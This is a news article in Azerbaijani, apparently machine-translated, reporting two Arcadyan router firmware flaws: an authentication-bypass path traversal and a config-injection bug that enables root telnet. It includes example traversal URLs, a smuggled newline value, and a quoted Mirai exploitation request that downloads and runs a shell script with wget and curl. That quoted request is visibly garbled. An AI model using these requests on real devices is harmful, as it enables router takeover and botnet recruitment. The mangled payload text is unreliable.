17 istehsalçıya təsir edən ev marşrutlaşdırıcılarında zəiflik

Arcadyan şirkətinin proqram təminatı HTTP server tətbiqindən istifadə edən ev marşrutlaşdırıcılarına qarşı şəbəkəyə kütləvi hücum qeydə alınıb. Cihazlar üzərində nəzarəti əldə etmək üçün kök hüquqları ilə ixtiyari kodun uzaqdan icrasına imkan verən iki zəifliyin birləşməsindən istifadə olunur. Problem Arcadyan, ASUS və Buffalo-dan kifayət qədər geniş çeşiddə ADSL marşrutlaşdırıcılarına, həmçinin Beeline brendləri ilə təchiz edilmiş cihazlara (problem Smart Box Flash-da təsdiqlənir), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone və digər telekommunikasiya operatorları. Qeyd olunur ki, problem 10 ildən artıqdır ki, Arcadyan mikroproqramında mövcuddur və bu müddət ərzində 20 müxtəlif istehsalçının ən azı 17 cihaz modelinə miqrasiya etməyi bacarıb.

Birinci boşluq, CVE-2021-20090, autentifikasiya olmadan istənilən veb interfeys skriptinə daxil olmağa imkan verir. Zəifliyin mahiyyəti ondan ibarətdir ki, veb-interfeysdə şəkillərin, CSS fayllarının və JavaScript skriptlərinin göndərildiyi bəzi kataloqlara autentifikasiya olmadan daxil olmaq mümkündür. Bu halda, identifikasiyası olmayan girişə icazə verilən qovluqlar ilkin maskadan istifadə etməklə yoxlanılır. Əsas kataloqa getmək üçün yollarda “../” simvollarının göstərilməsi mikroproqram tərəfindən bloklanır, lakin “..%2f” kombinasiyasından istifadə atılır. Beləliklə, “http://192.168.1.1/images/..%2findex.htm” kimi sorğular göndərilərkən qorunan səhifələri açmaq mümkündür.

İkinci boşluq, CVE-2021-20091, autentifikasiya edilmiş istifadəçiyə parametrlərdə yeni sətir simvolunun olub-olmadığını yoxlayan apply_abstract.cgi skriptinə xüsusi formatlaşdırılmış parametrlər göndərməklə cihazın sistem parametrlərində dəyişiklik etməyə imkan verir. . Məsələn, ping əməliyyatını yerinə yetirərkən təcavüzkar parametrlər faylını /tmp/etc/config/ yaradarkən yoxlanılan IP ünvanının olduğu sahədə “192.168.1.2%0AARC_SYS_TelnetdEnable=1” dəyərini və skripti təyin edə bilər. .glbcfg, ona “AARC_SYS_TelnetdEnable=1” sətrini yazacaq, bu, kök hüquqları ilə məhdudiyyətsiz əmr qabığına girişi təmin edən telnetd serverini aktivləşdirir. Eynilə, AARC_SYS parametrini təyin etməklə siz sistemdə istənilən kodu icra edə bilərsiniz. Birinci boşluq problemli skripti “/images/..%2fapply_abstract.cgi” kimi daxil olmaqla autentifikasiya olmadan işə salmağa imkan verir.

Zəifliklərdən istifadə etmək üçün təcavüzkar veb interfeysinin işlədiyi şəbəkə portuna sorğu göndərə bilməlidir. Hücumun yayılma dinamikasına əsasən, bir çox operator dəstək xidməti tərəfindən problemlərin diaqnozunu asanlaşdırmaq üçün xarici şəbəkədən öz cihazlarında girişi tərk edir. Əgər interfeysə giriş yalnız daxili şəbəkə ilə məhdudlaşırsa, “DNS rebinding” texnikasından istifadə edərək xarici şəbəkədən hücum həyata keçirilə bilər. Artıq boşluqlar marşrutlaşdırıcıları Mirai botnetinə qoşmaq üçün fəal şəkildə istifadə olunur: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Bağlantı: İstifadəçi-Agenti bağlayın: Qaranlıq fəaliyyət=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_paddress=212.192.241.7_0 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX

Mənbə: opennet.ru

Добавить комментарий